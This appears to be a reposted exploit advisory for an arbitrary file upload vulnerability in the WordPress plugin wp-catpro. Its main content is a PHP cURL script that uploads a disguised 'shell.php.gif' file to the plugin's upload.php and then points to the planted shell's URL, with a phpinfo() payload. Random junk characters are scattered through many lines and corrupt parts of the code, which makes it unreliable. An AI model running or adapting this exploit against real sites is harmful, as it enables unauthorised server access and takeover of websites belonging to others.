WordPress插件wp-catpro任意文件上传

admin

Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
#-----------------------------------------------------------------------

作者  => Zikou-16
邮箱 => zikou16x@gmail.com
5 D! W( A: `' L) Q4 d测试系统 : Windows 7 , Backtrack 5r3
下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
3 b/ B( Z  ?6 V2 y####
6 L+ \- [) U  b8 g; t
3 y/ G9 r, P) B  _% f+ a#=> Exploit 信息:
------------------
# 攻击者可以上传 file/shell.php.gif
# ("jpg", "gif", "png")  // Allowed file extensions
# f8 U0 d( k8 m& c9 J' Y* Z9 b- n# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
------------------

# b8 q% w4 k; i- H1 \1 p# |#=> Exploit
-----------
. H  T  p0 G& g+ p<?php

$uploadfile="zik.php.gif";
" m" J6 l$ J4 d8 e: e6 t; b& M2 Z$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
/ }1 B% Z# x  r; {5 Fcurl_setopt($ch, CURLOPT_POSTFIELDS,
- D+ U& N% x8 A3 xarray('Filedata'=>"@$uploadfile",
6 }+ C- I- R2 H. h( ]7 D3 x'folder'=>'/wp-content/uploads/catpro/'));
/ J8 [0 q0 S$ r! Z2 fcurl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  W- w5 q: \6 Z) P; C$postResult = curl_exec($ch);
4 I' X6 H. l* l& Pcurl_close($ch);

9 e+ m# }1 g- r/ q# rprint "$postResult";
+ z/ y9 M# M2 H; H
Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
% R( m& u& _2 I! l6 I* w& p  ?>
6 _( r! [2 {2 Y5 ~) F9 m<?php
phpinfo();
. K1 C" T0 W3 O5 a' d: @?>